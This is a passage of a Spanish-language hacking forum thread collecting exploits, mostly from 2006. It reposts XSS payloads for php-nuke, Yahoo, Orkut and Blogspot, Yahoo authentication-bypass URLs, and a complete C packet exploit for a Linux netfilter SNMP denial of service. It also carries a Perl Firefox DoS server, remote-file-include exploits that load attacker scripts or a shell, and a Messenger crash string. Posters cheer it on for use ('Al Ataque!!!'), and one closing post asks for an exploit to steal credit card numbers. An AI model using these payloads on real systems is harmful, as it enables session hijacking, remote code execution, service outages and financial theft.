Recopilatorio de Exploits Interesantes (-Actualizando-) página 4

En el buscador (search.php) de php-nuke pones:

Código:

"><body onload="alert(document.cookie)

Y te sale un alert con tu cookie.

También puede servir para versiones anteriores

Créditos:
O.G.

Este simple codigo provocara un error c++ runtime en el messenger si es colocado en un mensaje privado "msg:---------------------------------------------iframe onload=$InlineAction()>:)" (sin comillas) es posible colgar un messenger remoto enviando un archivo que tenga como nombre este código. No hace falta aceptar el archivo!

Se trata de un exploit surgido antes de que se presentaran soluciones para esta vulnerabilidad encontrada en Microsoft Excel. Este exploit es capaz de aprovechar la falla para ejecutar al TrojanDownloader.Small.CAK y al Spy.Flux, identificados así por el NOD32, en el sistema donde la hoja de cálculo maliciosa haya sido abierta. Este archivo .XLS puede llegar adjunto en correos no deseados o ser descargado de diversos sitios.

Fuente: http://spyware-war.mp3.es/bugs-errores/falla-en-microsoft-excel-es-aprovechada-por-exploit-dia-cero-2.html

Al Ataque!!!

Código:

Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding,
Cookie Encoding Security Weakness, Cross-Site Scripting and URL Redirection)

############################################################################
#
# XDisclose Advisory : XD100001
# Advisory Released : 20th June 06
# Credit : Rajesh Sethumadhavan
#
# Class : Authentication Bypass
# Session Binding Vulnerability
# Cookies Encoding Security Weakness
# Cross-Site Scripting
# URL redirection
# Severity : Medium
# Solution Status : Unpatched
# Vendor : Yahoo
# Affected applications : Yahoo multiple web-based services
#
############################################################################

Overview:
Yahoo! Inc. is an American computer services company with a mission to "be
the most essential global Internet service for consumers and businesses". It
operates an Internet portal, including the popular Yahoo! Mail.According to
Web trends Yahoo! is the most visited website on the Internet today with more
than 400 million unique users. The global network of Yahoo! websites received
3.4 billion page views per day on average as of October 2005.

Various Yahoo! services are vulnerable to authentication bypass, session
binding, weak cookie encoding, cross-site scripting file inclusion and url
redirection vulnerabilities, which is caused due to improper validation of
user-supplied inputs.

Description:
Multiple vulnerabilities exist in various Yahoo services.

1. Authentication Bypass and Session Binding Vulnerability.
A malicious user can log on to the yahoo without submitting the username
and password by constructing a malicious URL using cookies.

Same session (URL) can be used to login multiple times from multiple IP
address leading to session binding vulnerability.

POC:
--------------------------------------------------------------------------
http://msg.edit.yahoo.com/config/res...=0kvgvgv3qlf11
%26l=i42.j4ij/o&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0
BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http%3a//mail.yahoo.com
--------------------------------------------------------------------------
http://msg.edit.yahoo.com/config/res...=0kvgvgv3qlf11
%26l=i42.j4ij/o%26p=m2gvvind12000700&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMU
FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http
%3a//mail.yahoo.com
--------------------------------------------------------------------------

Where in "sk" & "d" is session

Screenshot:
http://www.xdisclose.bravehost.com/Images/Yahoo! Auth Bypass.png

2. Cookie Encoding Security Weakness
Implementation of cookies in yahoo is too weak that it can be decoded
easily. A malicious attacker can easily collect many personal information
using cookies like year of birth, zipcode, country and name which can be
used to get password from "yahoo forgot password".

Where in
sk & d is session
n is password
l is username
p is country, year of birth, gender and more
b is cookies created
lg is language
intl is international language
iz is zipcode
jb is Industry and title

POC Screenshot:
http://www.xdisclose.bravehost.com/Images/Yahoo Cookie Encoding.png

3. Cross-Site Scripting.
This vulnerability is resulted from the failure of Yahoo! filtering engine
to block cretin user-supplied inputs

a) Yahoo Calendar Service XSS
The flaws are due to improper sanitization of inputs passed to
"Location", "Address", "Street" and "Phone".

========================================================================
This event repeats every day.
</font><br>
<font face="Arial" size=-1>
<b>Event Location</b>: <script>alert('Location')</script>
<br><b>Street</b>: <script>alert('Address')</script>
<br><b>City, State, Zip</b>: <script>alert('Street')</script>
<br><b>Phone</b>: <script>alert('Phone')</script>
</font><br>
========================================================================

Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS Calendar location.png
http://www.xdisclose.bravehost.com/Images/XSS Calendar Address.png
http://www.xdisclose.bravehost.com/Images/XSS Calendar Street.png
http://www.xdisclose.bravehost.com/Images/XSS Calendar Phone.png

b) Yahoo Options Mail Account XSS
The flaws are due to improper sanitization of inputs passed to "Name"
and "Reply to" parameters.

========================================================================
<tr valign="top">
<td>Name:</td>
<td><script>alert('Name')</script></td>
</tr>

<tr valign="top">
<td>Email:</td>
<td>sec.test@yahoo.com</td>
</tr>
<tr valign="top">
<td>Reply-To:</td>
<td><script>alert('Reply')</script>@yah.com</td>
</tr>
========================================================================

Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS Mail Account Reply.png
http://www.xdisclose.bravehost.com/Images/XSS Mail Account Name.png

c) Yahoo Options Filter XSS.
The flaws are due to improper sanitization of inputs passed to "From"
and "To" parameters

========================================================================
<b>From</b> contains
"<b><script>alert('From')</script>@yahoo.com</b>"
<br>
<b>To/CC</b> contains
"<b><script>alert('To')</script>@yahoo.com</b>"
<br>
========================================================================

Screenshot:
http://www.xdisclose.bravehost.com/Images/Xss Filter From.png
http://www.xdisclose.bravehost.com/Images/Xss Filter To.png

d) Yahoo Ads flash file XSS.
The flaws are due to improper sanitization of inputs passed to flash Ads
files

Exploit:
-----------------------------------------------------------------------
http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
20060330_68006_asker1_sound.swf?clickTAG=javascript:alert('XSS%20
Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
20060330_68006_1_425x600_monster_morph_asker_1_check.swf?clickTAG=
javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20
Rajesh')

http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=javascript:alert('XSS
%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=javascript:alert
('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

http://ad.ie.doubleclick.net/812666/...o_300x250.swf?
clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20
By%20Rajesh')

http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=javascript:alert
('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=javascript:alert
('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
20060512_65459_1_360x100_mwa1_mail_accolades.swf?clickTAG=javascript:
alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

and more
-----------------------------------------------------------------------

Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS Flash Ads.png

e) Yahoo Mail Beta HTTP Header XSS
The flaws are due to improper sanitization of inputs passed to all HTTP
header like Accept, Accept-Charset, Accept-Language, Cache-Control,
Connection, Content-Length, Content-Type, Cookie, Keep-Alive, Pragma,
SOAPAction and User-Agent in Yahoo Mail Beta.

POC :
========================================================================
GET : http://uk.f555.mail.yahoo.com/ymws?m...id=CKyO7/zcUU2

Host: uk.f555.mail.yahoo.com
User-Agent: <script>alert('User-Agent:')</script>
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
text/plain;q=0.8,image/png,*/*;q=0.5;<script>alert('Accept:')</script>
Accept-Language: en-us,en;q=0.5;<script>alert('Accept-Language:')</script>
Accept-Encoding: gzip,deflate;<script>alert('Accept-Encoding:')</script>
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert
('Accept-Charset:')</script>
Keep-Alive: 300;<script>alert('Keep-Alive:')</script>
Connection: keep-alive;<script>alert('Connection:')</script>
SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert('SOAPAction:')
</script>
Content-Length: <script>alert('Content-Length:')</script>
Content-Type: application/xml;<script>alert('Content-Type:')</script>
Cookie: B=dcnl4j129c7tu&b=3&s=j3;
F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitnkGkgOOjxwPKS6&b=bIpq;
Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&p=m2gvvind12000700&jb=19|24|&iz=123456
r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&a=QAE&sk=DAAZ7oQuYalSuV&
d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0
E-;
U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB&un=0kvgvgv3qlf11;
YM.dpref1=sec.test%3Aspp%257C1;<script>alert('Cookie:')</script>
Pragma: no-cache;<script>alert('Pragma:')</script>
Cache-Control: no-cache;<script>alert('Cache-Control:')</script>
========================================================================

Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Charset.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Language.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cache-Control.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Connection.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Length.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Type.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cookie.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Keep-Alive.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Pragma.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta SoapAction.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta User-Agent.png

Impact:
Successful exploitation allows execution of arbitrary script code
in a users browser session in context of an affected site which may
allow to steal cookie based authentication credentials.

3. URL redirection.
This is due failure of filtering of incoming untrusted data before the
content reaches their users .This can be exploited for phishing attack. The
vulnerable parameters are yahoo search web, image, video, preferences, cache,
yahoo answers and more urls containing /*http://yahoo.com or /**http://
yahoo.com

Exploit:
---------------------------------------------------------------------------
http://rds.yahoo.com/_ylt=Ah0geusyaM...11do5qdq6/EXP=
1148028186/**http%3a//www.xdisclose.com

http://search.yahoo.com/preferences/...ces?pref_done=
http%3a//www.xdisclose.com
---------------------------------------------------------------------------

Screenshot:
http://www.xdisclose.bravehost.com/Images/URL Redirection WebSearch.png
http://www.xdisclose.bravehost.com/Images/URL Redirection Images.png
http://www.xdisclose.bravehost.com/Images/URL Redirection Video.png

4) Interesting facts about Yahoo
Yahoo Mail Inbox shows wrong unread messages count if it is above 65535
unread messages.

Screenshot:
http://www.xdisclose.bravehost.com/Images/Yahoo Inbox.png

Original Advisory:
http://www.xdisclose.com/XD100001.txt

Credits:
Rajesh Sethumadhavan has been credited with the discovery of this vulnerability

Disclaimer:
This entire document is strictly for educational, testing and demonstrating
purpose only. Modification use and/or publishing this information is entirely on
your own risk. The exploit code is to be used on your own email account. I am
not liable for any direct or indirect damages caused as a result of using the
information or demonstrations provided in any part of this advisory.

jimmy.

Solo hazlo

Código:

/*
* ecl-nf-snmpwn.c - 30/05/06
*
* Alex Behar <alex@ecl-labs.org>
* Yuri Gushin <yuri@ecl-labs.org>
*
* A patch review we did on the 2.6.16.17->18 Linux kernel source tree revealed
* a restructuring of code in the snmp_parse_mangle() and the snmp_trap_decode()
* functions. After further research it turned out to be a vulnerability
* previously reported[1] and assigned with CVE-2006-2444. For more details,
* the version change log.
*
*
*
* 1) http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.18
*
* --
* Greets fly out to the ECL crew - Valentin Slavov, Dimityr Manevski.
* To stranger, shrink, the Console Pimps crew (blexim, ex0, hugin, w00f, matt,
* kyu, kbd and the rest), our favorite soldier boy Sagi Horev, the SigMIL crew,
* izik, tanin00, and everyone else we left out.
*
* P.S. - blexim, how are your FACECRABS ???? :))))
*
*/

#ifndef _BSD_SOURCE
#define _BSD_SOURCE
#endif
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <libnet.h>

void banner();
void usage(char *);

char pwnage[] = "\x30\x0a\x02\x01\x00\x04\x03\x45\x43\x4c\xa4\x00";

int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct udphdr *UDP;
u_int32_t src = 0, dst = 0;

banner();

if (argc < 3) usage(argv[0]);

if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
exit(-1);
}

if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved source address.\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved destination address.\n");
exit(-1);
}

if ((buf = malloc(IP_MAXPACKET)) == NULL) {
perror("malloc");
exit(-1);
}

UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);

packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1;

srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5; /* header length */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_UDP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;

UDP->uh_sport = rand();
UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
UDP->uh_sum = 0;

memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1);

libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H);

if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l));
exit(-1);
}

printf("[+] Packet sent.\n");

libnet_destroy(l);
free(buf);
return (0);
}

void usage(char *cmd)
{
printf("[!] Usage: %s <source> <destination> [port]\n", cmd);
exit(-1);
}

void banner()
{
printf("\t\tNetfilter NAT SNMP module DoS exploit\n"
"\t\t Yuri Gushin <yuri@ecl-labs.org>\n"
"\t\t Alex Behar <alex@ecl-labs.org>\n"
"\t\t\t ECL Team\n\n\n");
}

//jimmy

Hola.

Código:

$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$ IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability
$$ script site: http://ideabox.phpoutsourcing.com/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$ Adam, DeathSpeed, Drzewko, pepi
$$
$$ Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
/*
19 Czerwca 2006r. Znikam na miesiac jade na wakacje :-)
---------------------------------------------------------------
19 June 2006 go to vacations !!!! I return for month, Cya ;-)
*/

#include.php:
/*
include("$gorumDir/generformlib_date.php");
include("$gorumDir/notification.php");
include("$gorumDir/zmail.php");
include("$ideaDir/user.php");
include("$ideaDir/globalsettings.php");
include("$ideaDir/init.php");
include("$ideaDir/idea.php");
include("$ideaDir/history.php");
include("$ideaDir/cord.php");
*/

#Expl:

http://www.site.com/[IdeaBox_path]/include.php?gorumDir=[evil_scripts]

#Pozdro dla wszystkich ;-)

//jimmy

# milw0rm.com [2006-06-19]

Vulnerabilidad en:

Mozilla Firefox version 1.5.0.6 y anteriores

Exploit:

#!/usr/bin/perl
#author: tomas kempinsky

use strict;
use Socket;

my $port = shift || 2121;
my $proto = getprotobyname(’tcp’);
my $payload =
“\x32\x32\x30\x20\x5a\x0d\x0a\x33″.
“\x33\x31\x20\x5a\x0d\x0a\x35\x30″.
“\x30\x20\x44\x6f\x53\x0d\x0a\x35\”.
“x30\x30\x20\x5a\x0d\x0a”;

socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die “socket: $!”;
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die “setsock: $!”;

my $paddr = sockaddr_in($port, INADDR_ANY);

bind(SERVER, $paddr) or die “bind: $!”;
listen(SERVER, SOMAXCONN) or die “listen: $!”;
print “ftp://D:oS@\x0localhost:2121/\n”;

my $client_addr;
while ($client_addr = accept(CLIENT, SERVER)) {
# find out who connected
my ($client_port, $client_ip) = sockaddr_in($client_addr);
my $client_ipnum = inet_ntoa($client_ip);
my $client_host = gethostbyaddr($client_ip, AF_INET);
print “: $client_host”, “[$client_ipnum]\n”;
# send them a message, close connection
print CLIENT $payload;
close CLIENT;
}

este no es un exploit pero tengan cuidado con este bug de html puede ser muy peligroso ya subido en ftp

<h2> Texto anterior al script</h2>
<script type="text/jscript">
function init() {
document.write("The time is now: " + Date() );
}
window.onload = init;
</script>
<h2>Texto posterior al script</h2>

dudas o comentarios posteenlos

Cita de: III_index_III en 25 Octubre 2006, 19:45

Lo probe en iexplore y en firefox y nada pero creo haber visto ese code, bue... aka mi advisore

Código:

###############################################################################################################

Minichat v6 Remote File Include
###############################################################################################################

Affected Software .: Minichat v6
Class................... : Remote File Inclusion
Found by.............: Zickox
Contact. ...............: los_misfits[at]hotmail.com

###############################################################################################################
Download Software:

http://www.linkini.net/phpscripts/descargas/Tagboards%20(12%20Archivos)/Minichat%20v6.0%20-%20Con%20instalador.zip

###############################################################################################################
Affected File:

ftag.php

###############################################################################################################

Code vulnerable:

<? include($_GET['mostrar']); ?>

###############################################################################################################

Exploit:

http://www.victim.com/path/ftag.php?mostrar=shell.txt?

###############################################################################################################

Special GreetingS: NETTOXIC | Txis | The Shredder | erboot | trty | jasus | Cvir.System | ZeroHack Team

# milw0rm.com [2006-10-11]

link: http://www.milw0rm.com/exploits/2519

salu2

Cross Site Scripting In Blogspot.es By Firewall

Cross Site Scripting in Comments
<script>alert(document.cookie)</script>
And /or <h1>ow3nd</h1>

Orkut Multiple Cross Site Scripting Vulnerabilities

#####################################################################

XDisclose Advisory : XD100092
Vulnerability Discovered: November 18th 2006
Advisory Released : December 08th 2006
Credit : Rajesh Sethumadhavan

Class : Cross Site Scripting
HTML Injection
Severity : Medium
Solution Status : Unpatched
Vendor : Google Inc
Vendor Website : http://www.orkut.com
Affected applications : Orkut Services
Affected Platform : All

#####################################################################

Overview:
Orkut is an Internet social network service run by Google and named
after its creator, Orkut Büyükkökten. It claims to be designed to
help users meet new friends and maintain existing relationships with
pictures and messages, and establish new ones by reaching out to
people you've never met before.

Orkut service is vulnerable to Cross-Site Scripting and HTML
Injection. This is caused due to improper validation of user-supplied
inputs.

Description:
A remote attacker can craft a GET request with the XSS payload as
demonstrated below. When the victim clicks on the GET request the
payload will get executed which result in stealing of cookie, IP info,
refer info, browser information, clipboard content, operating system
info, hardware Info, modification of page or html injection, url
redirection, port scanning of the network, and even phishing is
possible.

1)Orkut Invite XSS:

The flaws are due to improper sanitization of inputs passed to
'continue' parameter in GET request
-------------------------------------------------------------------
http://www.orkut.com/Invite.aspx?continue=javascript:alert(document.cookie)
------------------------------------------------------------------

Demonstration:
Note: Demonstration leads to your personal information disclosure

- Login to your orkut account
- Paste the above URL
- Click on BACK button
- Orkut Cookies will get displayed

The similar way HTML injection is also possible.

Vulnerable Code:
------------------------------------------------------------------

<td valign="top">
<table class="btn" border="0" cellpadding="0" cellspacing="0"
onmouseover="this.className='btnHover'" onmouseout="this.className
='btn'">
<tr style="cursor: pointer;" onclick="window.location='javascript:
alert(document.cookie)';" id="b0">
<td><img src="http://images3.orkut.com/img/bl.gif" alt="" /></td>
<td nowrap style="background: url
(http://images3.orkut.com/img/bm.gif)">back
</td>

------------------------------------------------------------------

2)Orkut Next page XSS:

The flaws are due to improper sanitization of inputs passed to 'nid'
parameter in GET request. This vulnerability is already fixed 2 days
before
Get Request with XSS payload:
------------------------------------------------------------------
http://www.orkut.com/Scrapbook.aspx?uid=3595989687719502785&pageSize
=&na=3&nst=-2&nid=13550271097807907792-%22};%20alert('Xdisclose');%
20function%20tt(){//
------------------------------------------------------------------

Vulnerable Code:
------------------------------------------------------------------

function changePageSize(value) {
window.location="/Scrapbook.aspx?uid=3595989687719502785&na=
1&nst=1&nid=13550271097807907792-"}; alert('Xdisclose');
function tt(){//&pageSize="+value;
}

------------------------------------------------------------------

Solution:
Orkut can improve their filters by disallowing certain characters
like " <>/\?&`~!@#$%^*()[]|;:"' " in user input URL.

Screenshot:
http://www.xdisclose.com/Images/xdorkutinvitexss.jpg

Impact:
Successful exploitation allows execution of arbitrary script code in
a user’s browser session in context of an affected site which result
in stealing of cookie, IP info, refer info, browser information,
clipboard content, operating system info, Referer info, hardware Info,
modification of page or html injection (temporary webpage defacement),
modification of page title, hijacking page flow, url redirection, port
scanning of the victim’s network, and even phishing is possible.

Impact of the vulnerability is network level.

Original Advisory:
http://www.xdisclose.com/XD100092.txt

Credits:
Rajesh Sethumadhavan has been credited with the discovery of this
vulnerability

Disclaimer:
This entire document is strictly for educational, testing and
demonstrating purpose only. Modification use and/or publishing this
information is entirely on your own risk. The exploit code is to be
used on your own orkut account. I am not liable for any direct or
indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.

Orkut Email Address Disclosure Vulnerability

#####################################################################

XDisclose Advisory : XD100097
Vulnerability Discovered: November 30th 2006
Advisory Released : December 8th 2006
Credit : Rajesh Sethumadhavan

Class : Information Disclosure
Severity : Highly Critical
Solution Status : Unpatched
Vendor : Google Inc
Vendor Website : http://www.orkut.com
Affected applications : Orkut Services
Affected Platform : All

#####################################################################

Overview:
Orkut is an Internet social network service run by Google and named
after its creator, Orkut Büyükkökten. It claims to be designed to
help users meet new friends and maintain existing relationships with
pictures and messages, and establish new ones by reaching out to
people you've never met before.

Orkut service is vulnerable to email address disclosure vulnerabilities.
Due to this It is possible to get email address of any users in orkut.
This is caused due to improper designing of orkut portal.

Description:
A remote attacker can get the email address of anyone in the orkut as
demonstrated below. The victim interaction is not required at all.

Demonstration:
Note: Demonstration leads to email address information disclosure

- Login to your orkut account
- Add any user as your friend (Person you want to get email address)
- Click 'friends' tab
- Click 'open friend requests' tab
- Click edit button the email address of the user will be displayed
as in the screenshot

Same way your can find your friends email address also

Solution:
Orkut can improve their portal design by hiding the users email address

Screenshot:
http://www.xdisclose.com/images/xdorkutemailid.jpg

Impact:
Successful exploitation allows email address disclosure.

Original Advisory:
http://www.xdisclose.com/XD100097.txt

Credits:
Rajesh Sethumadhavan has been credited with the discovery of this
vulnerability

Disclaimer:
This entire document is strictly for educational, testing and
demonstrating purpose only. Modification use and/or publishing this
information is entirely on your own risk. The exploit code is to be
used on your own orkut account. I am not liable for any direct or
indirect damages caused as a result of using the information or
demonstrations provided in any part of this advisory.

ho,a quisiera saber si se puede crear un xploit para sacar las claves de tarjetas de creditos

Foros de ayuda Yashira.org Videojuegos indetectables.net

Noticias Informatica Seguridad Informática ADSL eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.